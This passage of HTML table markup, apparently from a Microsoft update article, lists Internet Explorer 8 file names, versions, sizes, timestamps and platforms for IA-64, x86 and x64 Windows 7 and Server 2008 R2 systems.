class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">18,783,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">519,168</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">18,783,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">519,168</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">627,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">627,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">67,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">67,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">6,036,480</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">6,038,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">11,020,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">11,020,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,231,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,233,408</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">48,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">981,504</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">68,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">48,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">982,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">68,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">860,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">860,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">163,328</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">163,328</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">200,704</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">200,704</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">525,312</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">525,312</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,078,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.18269</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,078,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.22464</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">760,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">760,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported x64-based versions of Windows 7 and Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,492,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,494,528</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,188,864</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">95,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,189,888</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">95,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,012,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,012,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">735,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:21</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">735,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:21</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">97,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:21</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">97,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:13</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">9,065,984</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:21</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">9,070,080</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:37</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">451,072</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">451,072</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">293,376</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">293,376</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">505,344</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">505,344</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,458,112</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.18269</td><td class=\"sbody-td\">244,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,458,624</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.22464</td><td class=\"sbody-td\">244,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,111,040</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,111,040</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">134,144</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">134,144</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">12,295,168</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:13</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:20</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">12,295,680</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">627,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">627,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">67,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">67,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">6,036,480</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">6,038,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">11,020,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td 